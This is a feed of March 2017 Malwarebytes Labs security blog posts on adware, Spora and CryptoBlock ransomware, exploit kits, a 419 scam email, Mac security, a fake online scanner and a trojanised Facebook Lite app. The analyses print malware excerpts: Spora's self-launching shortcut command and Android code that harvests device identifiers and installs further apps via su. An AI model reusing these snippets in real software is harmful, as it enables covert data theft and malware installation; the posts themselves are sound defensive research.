Techie Feeds

Adware vs. Ad-fraud

Malwarebytes - Mon, 03/13/2017 - 18:18

Adware and ad-fraud are in the same business and both don’t care very much how they make money, as long as it keeps pouring in. But there are some major differences. To understand these differences it’s imperative to have a look at the separate entities.


Adware: any software application that shows advertisements while one of the components of the adware is running. The word is a contraction of advertising and software and often just regarded as “advertising-supported free-ware”.

This is the well-known trade-off of not having to pay for your software and having to look at some advertisements in return. While this simple business model may appeal to many of us, there are definitely boundaries. We draw lines at the amount of advertisements, the moment and the way they are presented to us (consider i.e. in-game advertising), and the kind of advertisements (i.e. pop-ups of an adult nature may give those looking over your shoulder the wrong idea).

There are also some criteria that security vendors take into consideration when classifying adware:

  • Do the advertisements disappear when you uninstall the software they came with?
  • Was the user given a warning and a chance to opt-out during install?
  • What is the nature of the changes the adware makes on the affected system?
  • How easy is it to remove under normal circumstances?
  • What is the impact on the user’s privacy?
  • Does the adware grab permissions to update itself or install other similar programs?

This is why you will see (most) adware classified as potentially unwanted programs (PUPs), some as spy-ware, and others could even be classified as Trojans.


Ad-fraud: a type of fraud that lets advertisers pay for advertisements even though the number of impressions (the times that the advertisement has been seen) is enormously exaggerated. There are many different methods to achieve this:

  • SEO fraud – sites are artificially made to appear to be very popular, so advertisers will pay high prices for advertisements nobody may ever see.
  • Stacking or stuffing – sites are filled with lots of advertisements. Sometimes on top of each other, or sometimes only one pixel big. When someone visits the site, all the advertisements register one impression.
  • Domain spoofing – the site where the advertisement is placed is another one as the advertiser expected. He pays a high price for a site with low or no traffic.
  • Click-fraud – systems that are part of a botnet or have some other Trojan infection, are sent to visit a site (or click on a URL). Despite the amount of impressions, the return value of the click is very low. The chance that the potential customer is mad at you, is bigger than the chance he’ll buy something.

The malware involved in this type of fraud is usually classified as a Trojan as the systems are remotely controlled and told to visit a site (to heighten the popularity) or click a URL (to register an impression). As you can imagine hiring a botnet to do these tasks for you is a lot cheaper than owning and running large server-farms, although this happens as well. Or they sometimes pay people in low-income countries to do micro-tasks for micro payment.


So, we have seen that both adware and ad-fraud earn their money in the advertising business. But the means are very different. While the main victims of adware are the users that may have knowingly installed advertising supported software, in the case of ad-fraud the main victims are the advertisers. Even though there might be unsuspecting users running click-bots or multi-purpose bots.


Pieter Arntz

The post Adware vs. Ad-fraud appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: Spora ransomware

Malwarebytes - Fri, 03/10/2017 - 18:00

Nowadays, ransomware has become the most popular type of malware. Most of the new families are prepared by amateurs (script-kiddies) and they are distributed on a small scale. There are only a few major players on this market that are prepared by professionals. Recently, Spora ransomware joined this set. As we will see, some of the elements suggest that there is a well-prepared team of criminals behind it.

Spora got some hype of being a ransomware that can encrypt files offline. In fact, this concept is nothing novel – we already saw many ransomware families that can do the same. For example DMA Locker 3.0, Cerber, or some newer editions of Locky. However, it has some other features that make it interesting.

Analyzed samples Distribution method

Spora is distributed by various ways – from phishing e-mails (described here) to infected websites dropping malicious payloads.

Some examples of the distribution method used by this ransomware are described here (the campaign from 14.02.2017) and here (the campaign from 06.03.2017).

Behavioral analysis

After being deployed, Spora ransomware runs silently and encrypts files with selected extensions. Then, it attempts to redeploy itself with elevated privileges. No UAC bypass mechanism has been used – instead, the UAC popup appears repeatedly till the user accepts it:

Then, it deploys another system tool – vssadmin, for deleting shadow copies:

It doesn’t even try to be silent – command line window is displayed.

It also drops its own copy into C: directory. Several modifications are being made in existing folder’s settings. First of all, Spora disables displaying an arrow icon to indicate shortcuts. It makes all the existing folders as hidden and creates shortcuts to each of them. The shortcut not only deploys the original folder but also the dropped malware sample.

Example of a command, deployed when the user clicks on the shortcut:

C:\Windows\C:\Windows\system32\cmd.exe /c start explorer.exe "Program Files" & type "81d59edde88fc4969d.exe" > "%temp%\81d59edde88fc4969d.exe" && "%temp%\81d59edde88fc4969d.exe"

Spora doesn’t change filenames, nor adds extensions. Each file is encrypted with a separate key (files with the same plaintext are encrypted to different ciphertexts). Encrypted content has high entropy, no patterns are visible, that suggest a stream cipher or chained blocks (probably AES in CBC mode).

Visualization of a file – before and after encryption:


The malware drops related files in several locations. The following files can be found in %APPDATA%.

The file with the .KEY extension and a ransom note in HTML format are also dropped on the Desktop:

The .KEY file contains encrypted data about the victim that needs to be uploaded later to the attacker’s website for the purpose of synchronizing the status of the victim.

When the encryption finishes, a ransom note pops up. In the first analyzed cases it was in a Russian language. However, other language versions also exists, for example – English note given below:

The content of the .KEY file is Base64 encoded and stored as a hidden field inside the ransom note:

In newer versions (#2) the .KEY file was not dropped at all, and the full synchronization with the remote server was based on its equivalent submitted automatically as the hidden field. It shows the second step in evolution of this ransomware – to make the interface even simpler and more accessible.

Website for the victim

Ransomware itself is not looking sophisticated, except for its website for the victim and the internals of the .KEY file (or it’s base64 equivalent). In older versions, a user was asked to upload the .KEY file to the website and all of his/her private information are retrieved, i.e. username, infection date, status, etc.

In newer versions, there is no necessity to upload anything – when the user clicks the link on the ransom note, the base64 content containing all the data is submitted automatically.

Some information is also encoded inside the victim ID: country code (first two characters), hash, statistics about encrypted files types (how many particular types of files has been encrypted of each category: office document, PDF, Corel Draw, DB, Image, Archive). You can find a decoder here.

Another step taken by authors to provide a user-friendly interface is the fact that the site (although hosted as a hidden service) does not require users to download a Tor browser, like most of the ransomware, but instead, provides a convenient gateway at


Spora executable comes packed in various crypters. It has been also observed distributed in bundles with other malware. In case #1, after defeating the first encryption layer, we can find two UPX-packed payloads. They can be unpacked by the standard UPX application. As a result, we are getting samples that are not further obfuscated. In the mentioned case, Spora ransomware was distributed along with a malicious downloader (38e645e88c85b64e5c73bee15066ec19) similar to the one described here. (Since this article is dedicated to Spora ransomware only, the second payload will not be further described).

Execution flow

Spora’s execution path varies depending on the parameter with which it has been deployed. On its initial run it is executed without any parameter. Then, the basic steps are the following:

1. Create mutex (pattern: m<VolumeSerialNumber:decimal>)

2. Decrypt AES protected data stored in the binary (i.e. RSA public key, ransom note, sample ID)

3. Search files with the attacked extensions. Make a list of their paths and statistics of the types.

4. Generate RSA key pair (one per victim)

5. Encrypt files with the selected extensions

After completing these operations, Spora redeploys it’s own binary – this time with Administrative privileges (causing UAC alert to pop-up). It passes in the command-line a parameter ‘\u’ that modifies the execution path.

Some of the steps that are executed in such case are:

1. Delete shadow copies

2. Modify lnkfile settings (in order to hide an arrow added by default to indicate shortcut – more about it’s purpose described in the section “Behavioral analysis”)

3. Drop it’s own copy and the ransom not on every drive

4. Deploy explorer displaying the ransom note

What is attacked?

Spora ransomware attacks the following extensions:

xls doc xlsx docx rtf odt pdf psd dwg cdr cd mdb 1cd dbf sqlite accdb jpg jpeg tiff zip rar 7z backup sql bak

They are grouped in several categories, used to build statistics for the attackers. The categories can be described as such: office documents, PDF/PPT documents, Corel Draw documents, database files, images, and archives:

Several system directories are excluded from the attack:

windows program files program files (x86) games How does the encryption works?

Encryption used by Spora ransomware is complex, follows several levels. It uses Windows Crypto API. The executable comes with two hardcoded keys: AES key – used to decrypt elements hardcoded in the binary, and an RSA public key – used to encrypt keys generated on the victim’s machine.

In addition to operations related to encrypting victim’s files, Spora uses Windows Crypto API for other purposes – i.e. to encrypt temporary data, and to decrypt some elements stored in the binary.

First, it creates a file in %APPDATA% – the filename is  the Volume Serial Number. This file is used for temporary storing information.

The temporarily stored information is encrypted with the help of the function CryptProtectData:

It includes, i.e. list of the fies to be encrypted (with extensions matching the list):

The malware sample comes with a hardcoded key that is being imported:

It is an AES 256 key, stored in a form of blob.  Explanation on the fields in the Blob Header:

08 - PLAINTEXTKEYBLOB - key is a session key 02 - CUR_BLOB_VERSION 0x00006610 - AlgID: CALG_AES_256 0x20 - 32 - key length

The AES key is used for decrypting another key, stored in a binary – that is an RSA public key:

-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC6COfj49E0yjEopSpP5kbeCRQp WdpWvx5XJj5zThtBa7svs/RvX4ZPGyOG0DtbGNbLswOYKuRcRnWfW5897B8xWgD2 AMQd4KGIeTHjsbkcSt1DUye/Qsu0jn4ZB7yKTEzKWeSyon5XmYwoFsh34ueErnNL LZQcL88hoRHo0TVqAwIDAQAB -----END PUBLIC KEY-----

After that, the same AES key is imported again and used to decrypt other elements:

  • The ransom note in HTML format:

  • A hardcoded ID of the sample:


For every victim, Spora creates locally a fresh pair of RSA keys. Below you can see the fragment of code generating new RSA key pair (1024 bit):

Explanation of the parameters:

0xA400 - AlgId: CALG_RSA_KEYX 0x04000001 - RSA1024BIT_KEY | CRYPT_EXPORTABLE

The private key from the generated pair is exported and Base64 encoded:

The formated version of the private key is stored in a buffer – along with the collected data about the machine and the infection, including: date, username, country code, malware sample id, and statistics of encrypted file types.


Then, another AES key is being generated. It is exported and encrypted by the public RSA key, that was hardcoded in the sample. Below – encrypting the exported AES key blob:

The generated AES key is used to encrypt the victim’s data (including the private key from the generated pair):

The prepared encrypted content is merged into one data block. First, the AES encrypted victim’s data is copied. After that follows the RSA encrypted AES key (selected on the below picture):

This merged data is stored in the .KEY file (or in the hidden, base64 encoded content in the ransom note). It needs to be uploaded to the server by the victim – that’s how the attackers get access to the data necessary to decrypt files after the ransom is paid.

Spora does not change files’ extensions, so it needs some other method of identifying whether or not the individual file is encrypted. It is done by reading some fragments of the content.

As we can see above, the 132 bytes at the end of the file are reserved for the data stored by Spora: 128 byte long AES key followed by its 4 byte long Crc32. In order to decide if the file is encrypted or not, data at the file’s end is read and the saved Crc32 is compared with the computed Crc32 of the read 128 bytes. If the check passed, Spora finishes processing the file. Otherwise, it follows with the encryption:

For each file, a new, individual AES key is generated. It is used to encrypt mapped file content. The exported representation of the individual key is encrypted by the previously generated RSA key and then stored at the end of the encrypted file. After that, it’s Crc32 is being computed and also stored at the end.


Spora is an interesting ransomware, for sure created by authors with programming experience. However, the code is not obfuscated and the execution is very noisy in comparison to other malware – it may suggest that the authors are not professional malware designers (in contrary to i.e. authors of Cerber).

The used cryptography implementation seems to have no flaws that would allow for decrypting attacked files without paying the ransom, so, we recommend focusing on prevention. Users with Malwarebytes 3.0 installed will be protected from Spora ransomware. While there currently is no decryption for those infected we suggest keeping a backup of the infected files as there might be a decrypter in the future.

Appendix – Spora ID decoder – Bleeping Computer about Spora

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post Explained: Spora ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

CryptoBlock ransomware and its C2

Malwarebytes - Fri, 03/10/2017 - 16:00

CryptoBlock is an interesting ransomware to keep an eye on. We expect this to be a ransomware that is in development to eventually develop into a RaaS (Ransomware as a Service).

Since the ransomware seems to be in development, we decided there might be some weak points and investigate if we could find one. Even though it is in development to be a RaaS, as it seems users have already been infected by this variant somehow.

After getting the name CryptoBlock, we decided to check at VirusTotal and see how many droppers for it we could find there, as well as to get some information on the ransomware. Finding a single dropper on VirusTotal, I noticed it was contacting the domain to send a key to and also to get a BTC wallet.

By going to this domain directly, we can see that the threat actor has left a note for interested, criminal consumers that the RaaS should be up and running soon.

Even with the RaaS not up and running yet, it’s obvious that the ransomware itself was already fully working for the threat actor, and they either had made a few early victims or they ran it on some test computers.

At this point, we decided to run a static analysis on the EXE. Seeing that .NET dll’s were called in the VirusTotal report, we knew it was written in C# or VB. So we opened the EXE in DNSpy, only to find that it was completely obfuscated with ConfuserEX, which is very hard to unravel, especially when it comes to the later versions.

Given the fact that we had a server to work with from previous research, I decided to start on that side, before going through a painstaking de-obfuscation process.

In the server we found some weird entries, pointing to what seemed to be a “Learn PHP game”.

After a search for a lot of these filenames and it didn’t take long before we came across a Pastebin example of one of these php pages. It was quite crude, but it was exactly what we were hoping to find.

Using this newfound information, we were able to look at a copy of the config.php file on the server.

Uh oh! What’s that? Those are the complete master credentials (username and password) to the entire CryptoBlock server, valid for every email, database, SSH, cPanel, and more. Having this information, we went to the site’s cPanel interface and got the login page as such:


Typing in the shiny new credentials gave us all we ever wanted for Christmas…complete access to a threat actor’s overseas server.

We have made copies of all databases, the PHP files, and the personal information used to rent the server.

Looking through the personal information, it became sadly obvious the hosting company didn’t require much more information than an email address to host this server. This email address turned out to be a fake one.

Let’s look at some of the stats for the server that were recovered from the apache logs and presented through statistics graphs.

Click to view slideshow.

One notable thing we can learn from these statistics, there is a possibility that this ransomware has been able to affect quite a few people. But even more interesting to us, it shows that there are a few IP addresses from Europe that have been visiting this server by the thousands since it was brought up. There is a huge chance that these IPs are the real IPs of the threat actor owning this server and were logged while they were performing their tests. This is further supported by the fact that the most used part of the site, is a PHP page that is used by the debug build of the ransomware server: checkaction.php.

Weirdly, the threat actor seems to have a database full of stolen credentials from “Pay for Porn” sites besides the database the ransomware uses.

Here is an example of the first page of the database tables used by the ransomware for IDs, BTC addresses, payments, and keys.

Another interesting fact we found is that the threat actor applied for a Blockchain API account, and was denied.

The threat actor is also distributing an exploitable Ammyy Admin executable from the server. It seems they either may be scamming people into letting them onto the machine remotely, or they are simply running it silently as a malicious drive-by. The file on the server is called test.exe.

We will keep an eye on the developments that this ransomware and the server will go through and try to keep you posted on any significant changes.

As far as protection from this threat though, if you are using Malwarebytes 3.0 with Anti-Ransomware technology, you are going to be protected from this ransomware at numerous levels, so please make sure you utilize it or a similar solution.

The post CryptoBlock ransomware and its C2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: Winter 2017 review

Malwarebytes - Thu, 03/09/2017 - 20:08

A few months have passed since our Fall 2016 review of the most common exploit kits we are seeing in our telemetry and honeypots. Today, we take another look at the current (bleak) EK scene by going over RIG, Sundown, Neutrino and Magnitude.

There haven’t been any major changes in the past little while and exploit kit-related infections remain low compared to those via malicious spam. This is in part due to the lack of fresh and reliable exploits in today’s drive-by landscape.

Pseudo-Darkleech and EITest are the most popular redirection campaigns from compromised websites. They refer to code that is injected into – for the most part – WordPress, Joomla, or Drupal websites and automatically redirects visitors to an exploit kit landing page.

Malvertising campaigns keep fuelling redirections to exploit kits as well, but can greatly vary in size and impact. The daily malverts from shady ad networks continue unchanged while the larger attacks going after top ad networks and publishers come in waves.

In the following video, we do a quick overview of those exploit kits; if you are interested in the more technical details please scroll down for additional information on each of them.

Most used vulnerabilities

Internet Explorer

  • CVE-2016-0189
  • CVE-2014-6332
  • CVE-2013-2551

Information disclosure

  • CVE-2016-3351
  • CVE-2016-3298
  • CVE-2016-0162


  • CVE-2016-7200
  • CVE-2016-7201


  • CVE-2016-4117
  • CVE-2016-1019
  • CVE-2015-8651
  • CVE-2015-7645


  • CVE-2016-0034

RIG EK remains the most popular exploit kit at the moment used both in malvertising and compromised websites campaigns. Its primary payloads are ransomware (Cerber and CryptoShield).

The landing page structure (URL and source code) hasn’t really changed, but it is now using a pre-landing page to filter bots and other non-legitimate traffic.

Payload here: Dreambot

Gate (browser check)

Landing page

Sundown EK

Sundown EK keeps on changing its URL patterns, mainly for the Flash exploit and its payload URLs. Sundown is a lot more quiet than RIG EK and for the most part contained to some malvertising campaigns.

Payload here: VenusLocker

Landing page

Neutrino EK

Neutrino EK seems to be the weapon of choice for special malvertising attacks that are difficult to reproduce. It features its usual pre-filtering gate that includes several checks against VMs and security software.

Payload here: Neutrino bot

Filtering gate (fingerprinting)

Landing page

Magnitude EK

Magnitude EK is a very geo-aware exploit kit being restricted to Asia at the moment. It uses decoy finance or bitcoin websites with a special referer to lead to its gate.

Payload here: Cerber

IE exploit

Landing page

Wrap up

There are more exploit kits than just those mentioned in this blog, but some were not included because they were simply copycats or because we have only seen them very sporadically.

Some EKs are indeed quite difficult to reproduce without a proper setup and some previous knowledge of the various traps affiliates and traffers are putting in the way. In other cases, they may fall off the radar until a new campaign (i.e. malvertising) is put in place.

While there hasn’t been a big focus on getting newer exploits integrated, we can note that exploit kit authors are investing some time into better bot detection and evasion, essentially trying to optimize the leads they are getting.

However, we should still be aware that this situation could change as new and powerful exploits can be discovered at any time and come with a ready-to-use proof of concept. For instance, CVE-2017-0037, a vulnerability that affects IE and Edge, is something attackers are likely to integrate soon.

The post Exploit kits: Winter 2017 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Torify and analyze traffic for your VM

Malwarebytes - Thu, 03/09/2017 - 18:00

Virtual machines are a great tool to run untrusted piece of software and analyzing the network activity. Most of the time, the default networking configuration uses a bridge to allow VMs to communicate. One caveat about this approach is that both the VM and the host will access the same network (like a personal trusted LAN for instance…), something definitely not desirable.

Multiple solutions exist to isolate the untrusted VMs from the host LAN. A few years ago we spoke about JanusVM which is no longer maintained and not so easy to set up. A more recent solution uses VirtualBox, Tor, and Whonix alongside Wireshark and is pretty quick to set up without bothering with DHCP or other network protocols.

Whonix is an  OS designed to run as a set of VMs with pre-installed and configured applications. Among other features, it uses Tor for all network connection thanks to Whonix-Gateway, a VM dedicated to be used as a gateway between Whonix VMs to the Tor network.

However, please note that UDP traffic won’t work due to Tor limitations. DNS queries will use Tor DnsPort on the Whonix Gateway to avoid leaks.

  1. Download Whonix-Gateway (look for Download Whonix-Gateway link),
  2. Download the associated signature, and the SHA512 file (also provided with its signature),
  3. Check them both,
  4. On VirtualBox, simply import the .ova downloaded above with File > Import Appliance,
  5. Leave the default settings untouched, read and agree the agreement,
  6. Start Whonix-Gateway VM and follow the initial instructions,
  7. You may want to activate the auto-update when prompted,
  8. For the VMs you want to redirect the traffic, go to Settings, Network and select Internal Network. Set Whonix as name.

Once Whonix-Gateway has been configured, you get the following network configuration:

auto eth1 iface eth1 inet static address netmask

Thus, you can assign your VMs in the range /18. For instance, the following static IP configuration is used for a first VM:

IP: Mask: Gateway: Primary DNS server:

All the traffic will now be isolated from your host LAN, and will only use Tor (including DNS queries). In order for this setup to work, whenever you want to connect one of your VM, the Whonix-Gateway has to be up. status page

A visit on from inside a VM using Whonix-Gateway should confir that the setups is working as expected.

Please keep in mind that this setup should not be trusted to provide serious anonymity guarantees.

Once the VMs are setup, simply install Wireshark or tshark. Configure them to listen on eth1… and profit!

Wireshark listening on eth1 on the Whonix Gateway.

The post Torify and analyze traffic for your VM appeared first on Malwarebytes Labs.

Categories: Techie Feeds

“Federal Ministry of Agriculture” 419 spam

Malwarebytes - Wed, 03/08/2017 - 17:55

This is just a short heads up to advise you to ignore the below missive, which is currently landing in mailboxes promising $35 million worth of riches.

From “Dr.Evans Egobia”, with the amazing subject line of “WITH REGARD”S………173.”:


Federal Ministry of Agriculture and Natural Resources
Address FCDA Secretariat, Garki
City Abuja
Phone +[snip]
Fax +[snip]
P.M.B. 135, Garki, Abuja, FCT

Dear Friend
It is with trust and confidence that i write to make this urgent business proposal to you.i was assigned by two of my colleague to seek for a foreign partner who will assist us in providing a convenient foreign account in any designated bank abroad for the transfer of us$35,500,000.00 pending on our arrival in your country for utilization and disbursement with the owner of the account.

this amount results from a deliberate inflation of the value of a contract awarded by our ministry – the federal ministry of agriculture (fma)to an expatriate company.the contract has been executed and payment made to the original contractor,remaining the over-invoiced amount of us$35.5 million,which we want to transfer the funds out the country in ourfavour for disbursement among ourselves.the transfer of this money can only be possible with the help of a foreigner who will be presented as the beneficiary of the fund.

as government officials, we are not allowed to operate foreign accounts,and this is the reason why we decided to contact you. we have agreed that if you/your company can act as the beneficiary of this fund (us$35,500,000.00 million)25% of the total sum will be for you for providing the account while 5% will be set aside for the expenses incurred during the cost of transfer of the fund into your account while 70% will be reserved for us.

we hereby solict for your assistance in providing a convenient account number in a designated bank abroad where this fund would be transferred.we intend coming over there on the completion of this transfer to secureour own share of the money.

please note that we have been careful and have made all arrangements towards the success and smooth transfer of the fund to your acccount beforeyou. for security reasons and confidenciality of this transaction, we demand that you should not expose this proposal and the entire transaction to anybody.

we are putting so much trust in you with the hope that you would not betray us. or sit on this money when it is finally transferred into your account.berest assured that this transaction is 100% risk free. if this proposal is acceptable to you,indicate your interest by sending a email to us including your bank name & address,account number,telephone and fax

note:our former president olusegun aremu obasanjo collaborated with the former chairman of the economic financial crime commission , mallam nuhun ribadu to stop the junior ranks officers from transferring funds out of the country. he sent different publication to many countries in the world as propaganda to discourage all government officials from transferring funds into an overseas account to avoid and save guides the countries economy.

apparently, so that other government officials will not benefits from these( oil windfalls venture) where he has been a culprit alone with his aides.more details about this transaction will be given to you as soon as we receive your positive respond.
note that the particular nature of your company’s business is irrelevant to this transaction. if this transaction interests you, your urgent response will be appreciated.
yours faithfully,
Dr.Evans Egobia

Reply to [snip]

This is a pretty straightforward 419 scam, which will likely turn into a money mule situation for the unlucky participant. Pieces of this email have been rattling around for some years now, and one would hope at least some potential victims would go Googling prior to firing off a response. Feel free to delete this scam message the moment you see it land in your mailbox – this definitely isn’t the get rich quick scheme you were hoping for.

Christopher Boyd

The post “Federal Ministry of Agriculture” 419 spam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac security facts and fallacies

Malwarebytes - Wed, 03/08/2017 - 16:00

There are many Mac security myths circulating among users. So how can you tell if the advice you’re reading is fact or fallacy? Read on to find out!

Fallacy: Macs don’t get viruses

The idea that there are no viruses for the Mac goes back to the beginning of Mac OS X, at the very beginning of this millennium. Most people associate this idea most strongly with the “I’m a Mac/I’m a PC” commercials from a decade ago, such as this one that ran in 2006:

Unfortunately, this is a myth. As with most good myths, though, there’s a slight element of truth.

Technically speaking, a virus is malware that spreads by itself, by attaching itself to other files. By this strict definition, there are no Mac viruses. However, by that token, there also aren’t very many Windows viruses these days, either. Viruses have mostly disappeared from the threat landscape.

The average person, though, understands a virus to be any kind of malicious software. (A better term for this is “malware.”) Since there definitely is malware for the Mac, as well as a plethora of other threat types, the spirit of the “there are no Mac viruses” claim is completely false. Don’t allow yourself to be misled!

Fact: There’s not much Mac malware out there

True malware is malicious in nature—thus the name, malicious software—with the goal of stealing or scamming data or money from the user. Examples of malware are backdoors that provide access to the computer, spyware that logs keystrokes and captures pictures with the webcam, ransomware that encrypts the user’s files in order to hold them for ransom, and other such nefarious programs.

On the Mac, true malware is rare. A “big spike” of new Mac malware happened in 2012, when 11 new pieces of malware appeared. The average Mac user has never seen any malware.

So why should Mac users be concerned? Because other threats are a rapidly growing problem on the Mac. Over the last several years, there has been an increasing amount of adware and Potentially Unwanted Programs (PUPs) for the Mac.

Adware is software that injects ads into websites where they don’t belong and changes your search engine to a different one. Adware is designed to scam advertisers and search engines. The infected Macs are no more than a vehicle for generating revenue fraudulently from advertisers and search engines, who pay these adware-producing “affiliates” for referrals.

PUPs are programs that are generally unwanted by users. These can include so-called “legitimate” keyloggers (marketed as a means for monitoring your kids or employees), scammy “cleaning” apps (Macs don’t need that kind of cleaning), supposed “antivirus” or “anti-adware” apps that don’t actually detect anything, and so on.

Adware and PUPs are a serious problem on the Mac right now. Although these things are not malware, they are a huge nuisance. Worse, they can create security vulnerabilities that make it more likely for you to get infected with actual malware. For example, in 2015, a vulnerability in a common PUP (MacKeeper) was used to install malware on Macs that had MacKeeper installed.

Fallacy: Macs are more secure than Windows

Many years ago, Apple abandoned the old “classic” Mac system in favor of one based on Unix, a mature and security-oriented system. Apple has made some great security improvements to macOS in recent years, and as a result, Macs are more secure today than they ever have been.

Of course, nothing is ever perfect, and macOS security is certainly far from it. There are plenty of ways to circumvent Mac security. Add to this the fact that security of Windows has improved over the years as well and it becomes difficult to say which system is more secure.

As with other such myths, there’s an element of truth here, though. Macs certainly suffer under a far smaller burden of threats than Windows. Many thousands of new Windows malware variants appear every day, while it’s a busy month in the Mac world if more than one new piece of malware appears. This means that, although there may not be any explicit, major security differences between the two systems, Macs do tend to be statistically safer simply due to the smaller number of threats.

Fact: macOS has built-in anti-malware software

Although this feature is well-hidden from the user, and cannot be turned off, this is true. Apple’s anti-malware software is called XProtect, and it consists of some basic signatures for identifying known malicious apps.

When you try to open an app for the first time, the system will check it against the XProtect signatures. If the app matches one of those signatures, the system won’t allow it to open.

Of course, there are a couple problems with XProtect. First, of course, as with any signature-based detection, it can only detect and block malware that Apple has seen before.

More importantly, though, it only detects malware. Since the vast majority of the threats for Macs are adware and PUPs, that leaves a lot that it doesn’t protect against. You shouldn’t rely on XProtect as your sole protection against threats, but nonetheless, this is very good layer of protection to have as an integral part of the system.

Fallacy: Macs don’t need security software

Antivirus software has gotten a bad rap on the Mac over the years. Thanks to historically low incidence of Mac malware, coupled with the system problems that some antivirus programs have been known to cause, Mac users are skittish about installing security software. Making matters worse, Mac “experts” will tell people that they don’t need security software, because macOS contains all the protection they need.

However, the number of Mac users infected by malware and other Mac threats has had exponential growth since 2010, when adware and PUPs weren’t really a thing on the Mac yet and when new malware sightings were few and far between. We’re seeing large numbers of people infected with Mac threats every day, on a much larger scale than even just a few years ago.

Clearly, there is an epidemic problem with threats—mostly adware and PUPs—on the Mac, and also clearly, the built-in security in macOS is not adequate to deal with this problem. It is becoming increasingly necessary for Mac users to have an additional layer of security, and in particular, to have something that is effective against adware and PUPs, which are the biggest problem. If you’re a Mac user, you might consider downloading software such as Malwarebytes Anti-Malware for Mac, which removes adware, PUPs, and malware for free.

The post Mac security facts and fallacies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A multi-purpose fake online scanner

Malwarebytes - Tue, 03/07/2017 - 16:00

Just to show you that behind some PUPs there are threat actors that are too lazy to be bothered, we offer you a fake online scanner that was used to promote the infamous MacKeeper and a Windows system optimizer called Advance-System-Care.


The redirect scheme on a Windows machine looked like this.

From a compromised website we were re-directed to systemcheck[.]club where we got this popup:

Clicking “OK” offered to start an online scan –

-which claimed to find a HIGH risk virus:

Thankfully these helpful people knew just the tool to remove this virus from our PC and brought us to www[.]advancepctools[.]info:

Here we installed Advance-System-Care which did not find the virus, but nevertheless had some very important tips on how to improve the system’s performance.

Pro tip: that phone number will not work as there is a format error in it.

That Advance-System-Care did not find the alleged virus is not surprising as Tapsnake is an Android infection that doesn’t work on Windows machines.

One other thing that did puzzle me, was that I also got this prompt while visiting the systemcheck[.]club site:

A Windows Internet Explorer prompt letting me know that: “VIRUS FOUND. It is necessary repair your Mac. Please do not leave the page. Click OK to begin the repair process.”

But when I showed this to our Mac researchers they had a very plausible explanation for this. Exactly the same fake scan is used to push MacKeeper on Mac systems.


My colleague @thomasareed recorded the proceedings on a Mac system, leading to the install of MacKeeper:

As you can see the scan and the scan-results are exactly the same. Only MacKeeper is consistent by finding the same threat (Tapsnake) on the system.


Although this setup seems to be designed for Mac users, it must have been considered a waste to not do anything with the Windows users that got sucked in. So a redirect was designed to provide a PUP system optimizer for these users.

Detection and protection

The site hosting the fake scanner and all the next steps in the redirection chain are blocked by Malwarebytes Premium Web Protection module.

The installer for Advance-System-Care is detected as PUP.Optional.AdvanceSystemCare

SHA256: 164cb18150d242e88de70b9f0e35478ab9aab88e0b723472dfdc278f6ea025da

Malwarebytes removes Advance-System-Care completely. A removal guide for Advance-System-Care can be found on our forums.


Special thanks to @thomasareed for sharing his research on the Mac side and @MysteryFCM for pointing out the URL.


Pieter Arntz

The post A multi-purpose fake online scanner appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs Presents: The Cybercrime Tactics and Techniques Report

Malwarebytes - Mon, 03/06/2017 - 18:04

Last year was interesting for malware distribution and development. While we still experienced a flood of ransomware and immense distribution of malware using malspam/phishing/exploit kits, some major players, such as TeslaCrypt and Angler EK, vanished, while some new names dominated.

In our first wrap-up of the threat landscape, we are going to cover the trends observed during the last few months of 2016, provide an analyst’s view of the threats, and offer some predictions for the beginning of 2017. Moving forward, every quarter we will bring you a view of the threat landscape through the eyes of Malwarebytes researchers and analysts.


Thanks for reading and safe surfing!

The post Malwarebytes Labs Presents: The Cybercrime Tactics and Techniques Report appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Facebook Lite infected with Spy FakePlay

Malwarebytes - Mon, 03/06/2017 - 16:00

A version of the popular mobile app Facebook has been found to be infected with what we detect as Android/Trojan.Spy.FakePlay.  Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).

The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receiver and service  Note the use of using a receiver and service name that attempts to hide under what some may think is Google Update; something an untrained eye may not catch.

Service runs whenever the phone is booted, and immediately runs receiver

Log entry from Android Device Monitor

Receiver contains the bulk of the malicious code.  Below are some chunks of code that steal personal information, and installs additional malicious apps.

Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc:
WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo();
HashMap localHashMap = new HashMap();
localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId());
localHashMap.put("SystemVersion", Build.VERSION.RELEASE);
localHashMap.put("Mac", localWifiInfo.getMacAddress());
localHashMap.put("PhoneType", Build.MODEL);
localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName());
localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber());
localHashMap.put("Location", a());

Code to install additional apps:
localProcess = Runtime.getRuntime().exec("su");
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
localPrintWriter.println("chmod 777 " + paramString);
localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib");
localPrintWriter.println("pm install -r  " + paramString);

The literal meaning of Trojan when it comes to computing is quote from Wikipedia any malicious computer program which is used to hack into a computer by misleading users of its true intent.  This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.

This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play and relies on third party apps stores that sometimes contain malicious apps like this.  If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections.  Stay safe out there!

Malicious MD5 samples:

The post Mobile Menace Monday: Facebook Lite infected with Spy FakePlay appeared first on Malwarebytes Labs.

Categories: Techie Feeds

